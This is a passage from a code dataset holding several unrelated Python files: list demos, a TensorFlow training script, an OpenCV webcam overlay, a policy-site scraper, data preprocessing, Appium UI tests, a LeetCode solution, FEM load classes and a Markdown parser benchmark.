print(len(clist))\n\n# Removal method: list.pop()\ndef pop_demo(alist):\n# pop() does two things: it returns the last element and removes that element from the list\n    print(alist.pop())\n    print(alist)\n# pop() with an argument\n    alist.pop(2)\n    print(alist)\nif __name__ == '__main__':\n    alist=[1,2,3,4,656]\n    pop_demo(alist)\n\n# Demonstrate the list sorting methods\ndef orderBy_demo():\n    # ascending\n    sort_demo()\n    # descending\n    reverse_demo()\n\n# Ascending sort method\ndef sort_demo():\n    # sort blist in ascending order\n    blist.sort()\n    print(blist)\n# Descending (reverse) method\ndef reverse_demo():\n    # reverse blist in place\n    blist.reverse()\n    print(blist)\n\n\n    \nif __name__ == '__main__':\n    blist=[1,2,3,45,89]\n    orderBy_demo()","sub_path":"day01/base_type.py","file_name":"base_type.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"373999276","text":"''' Libraries from sample code '''\nimport json\nimport pickle\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom typing import Dict\nimport torch\nfrom tqdm import trange\nfrom dataset_slot import SeqClsDataset\nfrom utils_slot import Vocab\n\n\n''' Libraries added by me '''\nimport os, time\nfrom tqdm import tqdm\nimport numpy as np\n\nimport tensorflow as tf\nfrom torch.utils.data import DataLoader\n# from pytorch_model import SeqClassifier\nfrom tf_model_3 import SeqClassifier\n\n\n''' Parameters from sample code '''\nTRAIN = \"train\"\nDEV = \"eval\"\nSPLITS = [TRAIN, DEV]\n\n\n''' Functions '''\ndef parse_args() -> Namespace:\n\n    now_time = time.strftime('%m%d_%H%M%S', time.localtime())\n\n    parser = ArgumentParser()\n\n    # data\n    parser.add_argument(\"--max_len\", type=int, default=35)\n\n    # model\n    parser.add_argument(\"--hidden_size\", type=int, default=1024)\n    parser.add_argument(\"--num_layers\", type=int, default=4)\n    parser.add_argument(\"--dropout\", type=float, default=0.1)\n    parser.add_argument(\"--bidirectional\", type=bool, default=True)\n\n    # optimizer\n    parser.add_argument(\"--lr\", type=float, default=1e-6)\n    parser.add_argument(\"--decay_rate\", type=float, default=0.9)\n\n    # data loader\n    parser.add_argument(\"--batch_size\", type=int, default=128)\n\n    # training\n    parser.add_argument(\n        \"--device\", type=torch.device,\n        help=\"cpu, cuda, cuda:0, cuda:1\", default=\"cuda\")\n    parser.add_argument(\"--num_epoch\", type=int, default=500)\n    parser.add_argument(\"--patience\", type=int, default=25)\n    parser.add_argument(\"--restore_best_weights\", type=bool, default=False)\n\n    # path\n    parser.add_argument(\n        \"--data_dir\", type=Path, help=\"Directory to the dataset.\",\n        default=\"./data/slot\")\n    parser.add_argument(\n        \"--cache_dir\", type=Path, help=\"Directory to the preprocessed caches.\",\n        default=\"./cache/slot\")\n    parser.add_argument(\n        \"--ckpt_dir\", type=Path, help=\"Directory to save the model file.\",\n        default=f\"./ckpt/slot/{now_time}\")\n    parser.add_argument(\n        \"--logs_dir\", type=Path, help=\"Directory to save the logs file.\",\n        default=f\"./logs/slot/{now_time}\")\n\n    args = parser.parse_args()\n    return args\n\n\ndef save_args(args):\n    d = vars(args)\n    with open(f\"{args.ckpt_dir}/args.txt\", mode='w') as f:\n        for key in d.keys():\n            f.write(f\"{key:20}: {d[key]}\\n\")\n    return\n    \n\ndef __get_data(cache_dir) -> Dict[str, DataLoader]:\n\n    with open(args.cache_dir / \"vocab.pkl\", \"rb\") as f:\n        vocab: Vocab = pickle.load(f)\n\n    tag_idx_path = args.cache_dir / \"tag2idx.json\"\n    tag2idx: Dict[str, int] = json.loads(tag_idx_path.read_text())\n\n    data_paths = {split: args.data_dir / f\"{split}.json\" for split in SPLITS}\n    data = {split: json.loads(path.read_text()) for 
split, path in data_paths.items()}\n    datasets: Dict[str, SeqClsDataset] = {\n        split: SeqClsDataset(split_data, vocab, tag2idx, args.max_len)\n        for split, split_data in data.items()\n    }\n\n    # TODO: create DataLoader for train / dev datasets # Done\n    data_loaders: Dict[str, DataLoader] = {\n        split: DataLoader(\n            split_dataset,\n            batch_size = 7244,\n            shuffle = False,\n            collate_fn = split_dataset.collate_fn\n        ) for split, split_dataset in datasets.items()\n    }\n\n    return datasets, data_loaders\n\n\ndef custom_loss(y_true, y_pred):\n    cce = tf.keras.losses.CategoricalCrossentropy()\n    # losses = tf.convert_to_tensor(0, dtype=tf.float32)\n    # for batch_i in range(tf.shape(y_true)[0]):\n    #     losses += cce(y_true[batch_i], y_pred[batch_i])\n    # losses /= tf.cast(tf.shape(y_true)[0], dtype=tf.float32)\n    # print(losses, cce(y_true, y_pred))\n    # return losses\n    return cce(y_true, y_pred)\n\n\ndef main(args):\n    \n    datasets, data_loaders = __get_data(args.cache_dir)\n\n    for d in data_loaders[TRAIN]:\n        train_X = tf.convert_to_tensor(d['encoded_tokens'], dtype=tf.float32)\n        train_Y = tf.convert_to_tensor(d['tag_one_hot'], dtype=tf.float32)\n\n    for d in data_loaders[DEV]:\n        valid_X = tf.convert_to_tensor(d['encoded_tokens'], dtype=tf.float32)\n        valid_Y = tf.convert_to_tensor(d['tag_one_hot'], dtype=tf.float32)\n\n    embeddings = tf.convert_to_tensor(torch.load(args.cache_dir / \"embeddings.pt\"))\n    model = SeqClassifier(\n        mode='slot', # Added by me\n        text_len=args.max_len, # Added by me\n        embeddings=embeddings,\n        batch_size=args.batch_size, # Added by me\n        dropout=args.dropout,\n        hidden_size=args.hidden_size,\n        num_layers=args.num_layers,\n        bidirectional=args.bidirectional,\n        num_class=datasets[TRAIN].num_classes,\n    )\n    lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n        initial_learning_rate=args.lr,\n        decay_steps=10000,\n        decay_rate=args.decay_rate\n    )\n    model.compile(\n        optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n        # loss=custom_loss,\n        loss=tf.keras.losses.CategoricalCrossentropy(reduction=tf.keras.losses.Reduction.SUM),\n        metrics=[\"accuracy\"],\n        # run_eagerly=True\n    )\n\n    callbacks = [\n        # MCP_ValLoss\n        tf.keras.callbacks.ModelCheckpoint(\n            f\"{args.ckpt_dir}/MinValLoss.h5\",\n            monitor='val_loss', mode='min', verbose=1,\n            save_best_only=True # , save_weights_only=True\n        ),\n        # MCP_ValAcc\n        tf.keras.callbacks.ModelCheckpoint(\n            f\"{args.ckpt_dir}/MaxValAcc.h5\",\n            monitor='val_accuracy', mode='max', verbose=1,\n            save_best_only=True # , save_weights_only=True\n        ),\n        # # ES_ValLoss\n        # tf.keras.callbacks.EarlyStopping(\n        #     monitor='val_loss', mode='min',\n        #     verbose=1, patience=args.patience,\n        #     restore_best_weights=args.restore_best_weights\n        # ),\n        # ES_ValAcc\n        tf.keras.callbacks.EarlyStopping(\n            monitor='val_accuracy', mode='max',\n            verbose=1, patience=args.patience,\n            restore_best_weights=args.restore_best_weights\n            # baseline=0.85022\n        ),\n        # TB\n        tf.keras.callbacks.TensorBoard(\n            log_dir=args.logs_dir,\n            write_graph=True, write_images=True,\n        )\n    ]\n\n    # time.sleep(3)\n    os.system('clear')\n    os.system('clear')\n\n    # print args\n    print(\"\\n\")\n    d = vars(args)\n    for key in d.keys():\n        print(f\"{key:20}: {d[key]}\")\n    print(\"\\n\")\n\n    history = model.fit(\n        x=train_X,\n        y=train_Y,\n        batch_size=args.batch_size,\n        epochs=args.num_epoch,\n        verbose=1,\n        callbacks=callbacks,\n        validation_data=(valid_X, valid_Y),\n        shuffle=True,\n    )\n\n    Min_ValLoss = min(history.history['val_loss'])\n    MVL_ValAcc = 
history.history['val_accuracy'][history.history['val_loss'].index(Min_ValLoss)]\n    print(f\"\\n\\nMin val_loss: {Min_ValLoss} ({Min_ValLoss:.5f}) --> val_accuracy: {MVL_ValAcc} ({MVL_ValAcc*100:.3f}%)\")\n\n    Max_ValAcc = max(history.history['val_accuracy'])\n    MVA_ValLoss = history.history['val_loss'][history.history['val_accuracy'].index(Max_ValAcc)]\n    print(f\"\\n\\nMax val_accuracy: {Max_ValAcc} ({Max_ValAcc*100:.3f}%) --> val_loss: {MVA_ValLoss} ({MVA_ValLoss:.5f})\")\n\n    print(\"\\n\")\n    args.ckpt_dir.rename(f\"{args.ckpt_dir}_{Min_ValLoss:.5f}-{MVL_ValAcc*100:.3f}%_{Max_ValAcc*100:.3f}%-{MVA_ValLoss:.5f}\")\n\n    # TODO: Inference on test set\n    return\n\n\n''' Execution '''\nif __name__ == \"__main__\":\n    args = parse_args()\n    args.ckpt_dir = Path(f\"{args.ckpt_dir}_numlayers={args.num_layers}\")\n    args.ckpt_dir.mkdir(parents=True, exist_ok=True)\n    args.logs_dir = Path(f\"{args.logs_dir}_numlayers={args.num_layers}\")\n    args.logs_dir.mkdir(parents=True, exist_ok=True)\n    save_args(args)\n    main(args)","sub_path":"development/train_slot.py","file_name":"train_slot.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"19877757","text":"import cv2\nimport os\nimport face_recognition as fr\nfrom PIL import Image\n\ndef load_resources(path):\n    files = os.listdir(path)\n    templates = []\n    for file_path in files:\n        if '.png' in file_path:\n            relative_path = os.path.join(path, file_path)\n            templates.append(cv2.imread(relative_path, -1))\n            print (templates[-1].shape)\n    return templates\n\ndef add_glasses(img, glasses, rate, cnt):\n    face_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_frontalface_default.xml')\n    eye_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_eye.xml')\n    face_locs = []\n    hat_locs = []\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    face_locs = face_cascade.detectMultiScale(gray, 1.3, 5)\n    for loc in face_locs:\n        x, y, w, h = loc\n        roi_gray = gray[y:y+h, x:x+w]\n        eyes = eye_cascade.detectMultiScale(roi_gray)\n        if (len(eyes) < 2):\n            continue\n        expected_y = h // 3\n        best_y = 123456789\n        for eye in eyes:\n            if abs(eye[1] - expected_y) < abs(best_y - expected_y):  # compare each eye's own y, not the face's\n                best_y = eye[1]\n        gw = int(w * 0.9)\n        delta = (w - gw) // 2\n        print(glasses.shape)\n        gh = int(gw / glasses.shape[1] * glasses.shape[0])\n        gx = x + int(delta * 1.2)\n        gy = y + expected_y - int(0.15 * gh)\n        if gx < 0 or gy < 0:\n            continue\n        glass_img = cv2.resize(glasses, (gw, gh))\n        for yi in range(gy, gy + gh):\n            for xi in range(gx, gx + gw):\n                if glass_img[yi - gy, xi - gx, 3] != 0:\n                    img[yi, xi] = glass_img[yi - gy, xi - gx, 0:3]\n    return face_locs, hat_locs, img\n\ndef add_hat(img, hat_templ, rate, cnt):\n    face_cascade = cv2.CascadeClassifier('/home/york_io/.local/lib/python3.6/site-packages/cv2/data/haarcascade_frontalface_default.xml')\n    face_locs = []\n    hat_locs = []\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    face_locs = face_cascade.detectMultiScale(gray, 1.3, 5)\n    for loc in face_locs:\n        width_scaled = int(loc[2] * 1.5)\n        width_original = hat_templ.shape[1]\n        scale_factor = width_scaled / width_original\n        estimated_height = int(hat_templ.shape[0] * scale_factor / 1.5)\n        delta = int(0.2 * estimated_height)\n        x, y, w, h = loc\n        hat_locs.append([y - estimated_height + delta, x + w, y + delta, x])\n    for hat_loc in hat_locs:\n        if hat_loc[0] < 0:\n            continue\n        t, r, b, l = hat_loc\n        w = r - l\n        h = b - 
t\n        hat_img = cv2.resize(hat_templ, (w, h))\n        for y in range(t, b):\n            for x in range(l, r):\n                if hat_img[y - t, x - l, 3] != 0:\n                    img[y, x] = hat_img[y - t, x - l, 0:3]\n    return face_locs, hat_locs, img\n\n\ndef show_webcam(templ, process, rate = 5):\n    cam = cv2.VideoCapture(0)\n    cnt = 0\n    face_locs = []\n    while True:\n        ret_val, img = cam.read()\n        face_locs, obj_locs, img = process(img, templ, rate, cnt)\n        cv2.imshow('my webcam', img)\n        if cv2.waitKey(1) == 27:\n            break  # esc to quit\n        cnt += 1\n    cv2.destroyAllWindows()\n\n\ndef main():\n    hat_templ = load_resources('hat_resources')\n    glass_templ = load_resources('glass_resources')\n    for t in glass_templ:\n        show_webcam(t, add_glasses, rate=3)\n    for t in hat_templ:\n        show_webcam(t, add_hat, rate=3)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"glasses.py","file_name":"glasses.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"139622597","text":"import os\nimport requests\nfrom lxml import etree\nimport config\nimport public_fun\n\n\ndef handle(search_word, page, s_date):\n    '''\n    Get the article urls from the search results\n    :param search_word: search keyword\n    :param page: page number\n    :return:\n    '''\n    url = 'http://www.bailuzhiku.com/policy/listResult'\n    headers = {\n        'Accept': '*/*',\n        'Accept-Encoding': 'gzip, deflate',\n        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',\n        'Connection': 'keep-alive',\n        'Content-Length': '249',\n        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n        'Cookie': 'UM_distinctid=174b08f0e9f751-046de8b491666e-f7b1332-1fa400-174b08f0ea0753; Hm_lvt_ec196724ce16461e3c277405b7fd5b34=1600690000,1600954535; ASP.NET_SessionId=4rbp124yzypezle4rhpto2ha; CNZZDATA1271635556=2128017459-1600685978-%7C1600961875; login=0AB50DBC033234B887CC04C65CEFDB55DCF4C4D20E676E2871DB5D62CB6E694AE5E7C5FBE096B4CFB0F94A6078317AF2A666E0BBFE4462E589B5A01AAD274038017190521182DE351C4015B5A3BFF55D0D06B214586270CC875C8AFFB237FEF1F14537703D6AECE7D7B1E688FA26A3159ED956F104017DD3648BF4C1A081735331FFFD9D0B7E6A1C504440004CF4B1C1295F39C0; Hm_lpvt_ec196724ce16461e3c277405b7fd5b34=1600962708',\n        'Host': 'www.bailuzhiku.com',\n        'Origin': 'http://www.bailuzhiku.com',\n        'Referer': 'http://www.bailuzhiku.com/policy/list?keyword=%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD',\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',\n        'X-Requested-With': 'XMLHttpRequest',\n\n    }\n    form_data = {\n        'pageSize': '20',\n        'Keyword': search_word,\n        'Type': '0',\n        'IsJoinGov': '0',\n        'IsQueryDate': '0',\n        'EngSortType': '0',\n        'EngSearchType': '0',\n        'PageIndex': page,\n        'PageSize': 20,\n        'RowsCount': '0'\n    }\n    index_url2 = 'http://www.bailuzhiku.com{}'\n    res = requests.post(url=url, headers=headers, data=form_data)\n    res.encoding = res.apparent_encoding\n    html = etree.HTML(res.text)\n    data = html.xpath('//*[@class=\"newsList\"]/h3/a/@href')\n    date = html.xpath('//*[@class=\"clearfix\"]/li[1]/span/text()')\n    result = []\n    if data:\n        pages = page + 1 if data else 0\n        for d in range(len(data)):\n            if public_fun.calc_date(s_date=s_date, e_date=date[d]):\n                result.append(index_url2.format(data[d]))\n        return result, pages\n    else:\n        print('url1 404 error:', res.status_code, url)\n        return [], 0\n\n\ndef get_data(url, search_word, max_text):\n    '''\n    1. Site source “source” (Baijing Chuhai “bjch” / Weilai Zhiku “wlzk” ...)\n    2. Article ID “doc_id” (the id of the crawled page)\n    3. Publication date “date” (format: 20200129)\n    4. Download url “download_url”\n    5. Author/organisation “org_name” (e.g. some broker / some securities firm)\n    6. 
Pages/word count “page_num”/ “word_count”; use the page count if there is a pdf file, otherwise the word count\n    7. Document type “doc_type” (research report: “EXTERNAL_REPORT”/news: “NEWS”)\n    8. Article title “title” (\"SMIC: prospectus for the initial public offering and listing on the STAR Market\")\n    :param search_word: search keyword\n    :param url: url2, link to the article content\n    :return:\n    '''\n    json_result = {'source': 'blzk', 'doc_id': '', 'date': '', 'download_url': '',\n                   'org_name': '', 'page_num': '1', 'doc_type': 'NEW', 'title': ''}\n    path = os.path.join(config.SAVE_PATH, search_word, 'news', 'bailuzhiku')\n    res = requests.get(url=url, headers=config.HEADERS)\n    html = etree.HTML(res.text)\n    content_text = public_fun.filter_space_json(html.xpath('//*[@class=\"textarea-box policy-textarea\"]//text()'))\n    if len(content_text) > max_text:\n        try:\n            doc_id = url.split('/')[-1].replace('.html', '')  # article ID\n            title = html.xpath('//*[@class=\"policy-wrap-title\"]/h1')[0]  # article title\n            description = html.xpath('//*[@class=\"textarea-box policy-textarea\"]')[0]  # article content\n            html_list = [title, description]\n            html_result = public_fun.filter_space_html(html_list)\n            json_result['doc_id'] = doc_id\n            json_result['date'] = public_fun.filter_space_json(\n                html.xpath('//*[@class=\"attribute-table\"]/tbody/tr[2]/td[1]/div/text()')[0]\n                .replace('-', ''))\n            json_result['download_url'] = 'http://www.bailuzhiku.com/' + \\\n                                          html.xpath('//*[@class=\"header-tool-link download\"]/@href')[0]\n            try:\n                json_result['org_name'] = public_fun.filter_space_json(\n                    html.xpath('//*[@class=\"attribute-table\"]/tbody/tr[1]/td[1]/div/text()')[0])\n            except:\n                json_result['org_name'] = ''\n            json_result['title'] = public_fun.filter_space_json(html.xpath('//h1[@class=\"title\"]/text()')[0])\n            public_fun.write_down_json(path=path, filename=doc_id + '.json', text=json_result)\n            public_fun.write_down_html(path=path, filename=doc_id + '.html', text=html_result)\n        except Exception as e:\n            print(e.__traceback__.tb_lineno, url, e)\n    else:\n        print('Article text is shorter than', max_text)\n\n\ndef main(search_word, max_art, max_text, s_date):\n    '''\n    Qianbidao crawler entry function\n    :param search_word: search keyword\n    :return: None\n    '''\n    page = 1\n    url2_list = []\n    while page:\n        one_page_url, pages = handle(search_word=search_word, page=page, s_date=s_date)\n        url2_list += one_page_url\n        if len(url2_list) < max_art and page < int(pages):\n            page += 1\n        else:\n            page = 0\n    url2_list = url2_list[:5] if config.DEBUG else url2_list\n    for url2 in url2_list:\n        get_data(url=url2, search_word=search_word, max_text=max_text)\n\n\nif __name__ == '__main__':\n    p0 = '人工智能'\n    p1 = 10\n    p2 = 500\n    p3 = '2018-01-01'\n    r2 = main(search_word=p0, max_art=p1, max_text=p2, s_date=p3)\n","sub_path":"Backend/scrapers/news/temp/bailuzhiku.py","file_name":"bailuzhiku.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"337958217","text":"import os.path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport getopt\nimport math\nfrom pandas import DataFrame\nsys.path.append('../../data')\nsys.path.append('../../../data')\nsys.path.append('/home/invyz/workspace/Research/lake_monitoring/src/data')\n\nfrom rw_data import readMatData, saveMatData\n\n#######################################################\n# UNFINISHED - preprocess for observed data experiments\n###########################################################\n\ndata_fpath = \"../../../data/processed/mendota.mat\"\ndata_samp_fpath = \"../../../data/processed/mendota_sampled.mat\"\n#parse command line arguments\ndef main(argv):\n    seq_length = ''\n    try:\n        opts, args = getopt.getopt(argv,\"hl:\",[\"sLength=\"])\n    except 
getopt.GetoptError:\n        print('usage: RNN_preprocess_obs.py -l <seq_length>')\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt == '-h':\n            print('RNN_preprocess_obs.py -l <seq_length>')\n            sys.exit()\n        elif opt in (\"-l\", \"--seq_length\"):\n            seq_length = arg\n            print ('sequence length is ', seq_length)\n\nseq_length = -1\nmain(sys.argv[1:])\nif(len(sys.argv[1:]) == 2):\n\tseq_length = int(sys.argv[2])\nelse:\n\tprint(\"ERROR, usage: RNN_preprocess_obs.py -l <seq_length>\")\n\n\n#load data\nmat = readMatData(os.path.abspath(data_fpath))\nmat_s = readMatData(os.path.abspath(data_samp_fpath))\n\n\nx = mat_s['Xc_doy'][:,0:11]\ny = mat['Observed_temp']\n\n\nstd_depth_values = np.array(np.sort(list(set(mat['Xc_doy'][:,2].flat))))\n\nn_depths = len(set(mat_s['Depth'].flat))\nu_depth_values = np.array(np.sort(list(set(mat_s['Depth'].flat))))\ndepths_s = mat_s['Depth']\ndepths = mat['Depth']\nudates = np.array(np.sort(list(set(mat_s['datenums'].flat))))\nnum_u_dates = np.shape(udates)[0]\ndatenums = mat['datenum']\ndatenums_s = mat_s['datenums']\nn = np.shape(x)[0]\nn_s = np.shape(y)[0]\n###########################################\n#create matrix that maps (depth, time) pair to modeled temp\n###############################\n\n\n#TODO generalize these parameters\n\n#parameters\nseq_per_depth = math.floor(n / seq_length)\nn_features = 11 #hardcoded for now, maybe not in the future?\nn_seq = seq_per_depth * n_depths\nn_ignore_dates = n - seq_per_depth*seq_length\nprint(n_ignore_dates)\n\n\n\n\nseq_mat_feat = np.empty(shape=(n_depths, num_u_dates, n_features))\nseq_mat_label = np.zeros(shape=(n_depths, num_u_dates, 1))\n#ignore remainder dates\n\nignore_dates = udates[-n_ignore_dates:]\n\n#fill feature matrix, with depth as rows and dates as columns\nfor i in range(0,n):\n\tif(i % 50000 == 0):\n\t\tprint(i, \" data processed\")\n\tif mat_s['datenums'][i] in ignore_dates:\n\t\t#skip over ignored dates\n\t\tcontinue\n\telse:\n\t\t#get depth and datenum indices for matrix\n\t\tdepth_ind = np.where(u_depth_values == depths_s[i])[0]\n\t\tdatenum_ind = np.where(udates == datenums_s[i])[0]\n\n\t\t#place data\n\t\tseq_mat_feat[depth_ind,datenum_ind,:] = x[i,:]\n\n\t\t# #find y that matches\n\t\t# seq_mat_label[depth_ind,datenum_ind,0] = y[i]\n\nnotAdded = 0\n\nfor i in range(0,n_s):\n\t#fill sample labels from observed data\n\tif mat['datenum'][i] in ignore_dates:\n\t\tcontinue\n\telse:\n\t\tdepth_ind = np.where(u_depth_values == depths[i])[0]\n\t\tdate_ind = np.where(udates == datenums[i])[0]\n\n\t\tif(depth_ind.size == 0 or date_ind.size == 0):\n\t\t\tprint(\"depth \", depths[i], \" not in sampled dataset\",\n\t\t\t\t  \" or \", datenums[i], \" not in it\")\n\t\t\tnotAdded += 1\n\n\t\telse:\n\t\t\tseq_mat_label[depth_ind, date_ind, 0] = y[i]\n\nprint(\"labels used \", np.count_nonzero(seq_mat_label))\nprint(\"labels not used \", notAdded)\n\n#removes depths with not many labels\n# depth_observation_cutoff = 35\n# depth_rm_ind = []\n# for d in range(0,n_depths):\n# \tif np.count_nonzero(seq_mat_label[d,:]) < depth_observation_cutoff:\n# \t\tdepth_rm_ind.append(d)\n# \t#print(\"depth \", d, \": \", np.count_nonzero(seq_mat_label[d,:]))\n\n# seq_mat_feat = np.delete(seq_mat_feat, depth_rm_ind, axis=0)\n# seq_mat_label = np.delete(seq_mat_label, depth_rm_ind, axis=0)\n\n\nmat['Depth_Time_Series_Features'] = seq_mat_feat\nmat['Depth_Time_Series_Labels'] = seq_mat_label\nsaveMatData(mat, 
os.path.abspath(data_fpath))\n\n\n","sub_path":"src/scripts/one-off/RNN_preprocess_obs.py","file_name":"RNN_preprocess_obs.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281981777","text":"from appium.webdriver.common.touch_action import TouchAction\nfrom Base.base import Base\nimport Data\nfrom Base.get_driver import GetDriver\nfrom time import sleep\nclass PageUnlock(Base):\n    def __init__(self,driver):\n        self.driver=driver\n\n    # Open Settings and swipe up until the page shows “安全” (Security)\n    def page_scorll_safety(self):\n        self.base_scroll(Data.unlock_storage,Data.unlock_WLAN)\n\n    # Tap “安全” (Security)\n    def page_click_safety(self):\n        elements=self.base_find_elements(Data.unlock_safety)\n        for element in elements:\n            if \"安全\" in element.text:\n                element.click()\n                break\n    # Tap the screen-lock method entry\n    def page_click_lock_screen_way(self):\n        self.base_click_element(Data.unlock_lock_screen_way)\n\n    # Tap “Pattern”\n    def page_click_icon(self):\n        self.base_click_element(Data.unlock_lock_icon)\n\n    # Draw the unlock pattern; grid points: 1(90,320) 2(270,320) 3(450,320) 4(450,500)\n    def page_press_move_to(self):\n        TouchAction(self.driver).press(x=90,y=320).wait(2000).move_to(x=270,y=320).release().perform()\n\n\nif __name__ == '__main__':\n    d=GetDriver().get_driver()\n    p=PageUnlock(d)\n    p.page_scorll_safety()\n    sleep(2)\n    p.page_click_safety()\n    sleep(2)\n    p.page_click_lock_screen_way()\n    p.page_click_icon()\n    p.page_press_move_to()","sub_path":"Page/page_unlock.py","file_name":"page_unlock.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"337914027","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    def leafSimilar(self, root1, root2):\n        \"\"\"\n        :type root1: TreeNode\n        :type root2: TreeNode\n        :rtype: bool\n        \"\"\"\n        leaf1 = []\n        leaf2 = []\n\n        def dfs(root, leaf):\n            tree = [root]\n            while tree:\n                node = tree.pop()\n                if not node:\n                    continue\n                tree.append(node.left)\n                tree.append(node.right)\n                if not node.left and not node.right:\n                    leaf.append(node.val)\n\n        dfs(root1, leaf1)\n        dfs(root2, leaf2)\n        return leaf1 == leaf2\n","sub_path":"872 Leaf-Similar Trees.py","file_name":"872 Leaf-Similar Trees.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"256114844","text":"class MassLoad:\n    \n    def __init__(self, magnitude=None, DOF=None):\n        self.magnitude = magnitude\n        self.DOF = DOF\n    \n\n\nclass NodalLoad:\n    \n    def __init__(self, magnitude=None, node=None, DOF=None):\n        self.magnitude = magnitude\n        self.node = node\n        self.DOF = DOF\n\n\nclass TimeDependentLoad(NodalLoad):\n    \n    def __init__(self, time_history=None, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        if self.magnitude is None:\n            self.magnitude = 1\n        self._history = self.magnitude * time_history\n        self.total_steps = len(time_history)\n    \n    def time_history(self, timestep):\n        if timestep < self.total_steps:\n            return self._history[timestep]\n        else:\n            return 0\n\nclass InertiaLoad(MassLoad):\n    \n    def __init__(self, time_history=None, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        if self.magnitude is None:\n            self.magnitude = 1\n        self._history = self.magnitude * time_history\n        self.total_steps = time_history.shape[0]\n    \n    def time_history(self, timestep, direction_vector, out):\n        if timestep < self.total_steps:\n            out += self._history[timestep] 
* direction_vector\n else:\n pass\n \n \n \n \n ","sub_path":"fem/core/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18492472","text":"import argparse\nfrom importlib import import_module\nimport os\nimport re\nfrom time import perf_counter\n\nALL_PACKAGES = (\n \"python-markdown:extra\",\n \"mistune\",\n \"commonmark.py\",\n \"mistletoe\",\n \"myst_parser:html\",\n \"myst_parser:docutils\",\n \"myst_parser:sphinx\",\n)\n\n\ndef benchmark(package_name, version=None):\n def decorator(func):\n def inner(text, num_parses):\n try:\n package = import_module(package_name)\n print(\"(\" + (version or package.__version__) + \")\", end=\": \")\n except ImportError:\n return \"not available.\"\n start = perf_counter()\n for i in range(num_parses):\n func(package, text)\n end = perf_counter()\n\n return end - start\n\n return inner\n\n return decorator\n\n\n@benchmark(\"markdown\")\ndef run_python_markdown_extra(package, text):\n return package.markdown(text, extensions=[\"extra\"])\n\n\n@benchmark(\"mistune\")\ndef run_mistune(package, text):\n return package.markdown(text)\n\n\n@benchmark(\"commonmark\", \"0.9.1\")\ndef run_commonmark_py(package, text):\n return package.commonmark(text)\n\n\n@benchmark(\"mistletoe\")\ndef run_mistletoe(package, text):\n return package.markdown(text)\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_html(package, text):\n package.parse_text(text, \"html\")\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_docutils(package, text):\n package.parse_text(text, \"docutils\", config={\"ignore_missing_refs\": True})\n\n\n@benchmark(\"myst_parser\")\ndef run_myst_parser_sphinx(package, text):\n package.parse_text(text, \"sphinx\", load_sphinx_env=True)\n\n\ndef run_all(package_names, text, num_parses):\n prompt = \"Running {} test(s) ...\".format(len(package_names))\n print(prompt)\n print(\"=\" * len(prompt))\n for package_name in package_names:\n print(package_name, end=\" \")\n func_name = re.sub(r\"[\\.\\-\\:]\", \"_\", package_name.lower())\n print(\n \"{:.2f} s\".format(globals()[\"run_{}\".format(func_name)](text, num_parses))\n )\n return True\n\n\ndef main(args=None):\n parser = argparse.ArgumentParser(description=\"Run benchmark test.\")\n parser.add_argument(\"path\", type=str, help=\"the path to the file to parse\")\n parser.add_argument(\n \"-n\",\n \"--num-parses\",\n metavar=\"NPARSES\",\n default=1000,\n type=int,\n help=\"The number of parse iterations (default: 1000)\",\n )\n parser.add_argument(\n \"-p\",\n \"--package\",\n action=\"append\",\n default=[],\n help=\"The package(s) to run (use -p multiple times).\",\n choices=ALL_PACKAGES,\n metavar=\"PACKAGE_NAME\",\n )\n args = parser.parse_args(args)\n\n assert os.path.exists(args.path), \"path does not exist\"\n print(\"Test document: {}\".format(os.path.basename(args.path)))\n print(\"Test iterations: {}\".format(args.num_parses))\n with open(args.path, \"r\") as handle:\n text = handle.read()\n return run_all(args.package or ALL_PACKAGES, text, args.num_parses)\n","sub_path":"myst_parser/cli/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"14552417","text":"from twilio.rest import Client\nfrom keys import key\n\nclass Messenger():\n def __init__(self):\n 